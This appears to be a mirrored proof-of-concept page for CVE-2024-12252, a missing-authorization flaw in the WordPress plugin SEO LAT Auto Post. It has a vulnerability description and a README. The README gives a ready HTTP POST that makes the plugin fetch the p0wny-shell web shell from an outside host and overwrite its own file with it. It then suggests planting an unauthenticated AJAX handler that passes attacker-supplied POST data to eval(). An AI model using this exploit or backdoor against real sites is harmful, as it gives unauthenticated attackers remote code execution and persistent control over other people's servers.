CVE-2024-12252 PoC — WordPress plugin SEO LAT Auto Post 代码注入漏洞

Source

https://github.com/RandomRobbieBF/CVE-2024-12252

Associated Vulnerability

Title:WordPress plugin SEO LAT Auto Post 代码注入漏洞 (CVE-2024-12252)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin SEO LAT Auto Post 2.2.1版本及之前版本存在代码注入漏洞，该漏洞源于remote_update函数缺少功能检查，导致文件覆盖。

Description

SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution)

Readme

# CVE-2024-12252
SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution)

# Description

The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the remote_update AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the seo-beginner-auto-post.php file which can be leveraged to achieve remote code execution.

## Details

- **Type**: plugin
- **Slug**: seo-beginner-auto-post
- **Affected Version**: 2.2.1
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12252
- **Status**: Closed

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

action=remote_update&url=https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php
```

This will overwrite `https://wp-dev.ddev.site/wp-content/plugins/seo-beginner-auto-post/seo-beginner-auto-post.php` - I would advise to alter the current plugin and add a nopriv action for a rce. `https://plugins.svn.wordpress.org/seo-beginner-auto-post/trunk/seo-beginner-auto-post.php`

add a function like.

```


// Add the AJAX action
add_action('wp_ajax_nopriv_execute_code', 'execute_code_callback');
add_action('wp_ajax_execute_code', 'execute_code_callback');

// The callback function
function execute_code_callback() {
    // Get the code to execute from the request
    $code = $_POST['code'];

    // Execute the code
    eval($code);

    // Return a success message
    echo 'Code executed successfully!';
    wp_die();
}
```

File Snapshot


 [4.0K]  /data/pocs/eb37c8033e602f3e028bcc4b6a2ea1405ce0a0f4
└── [1.9K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!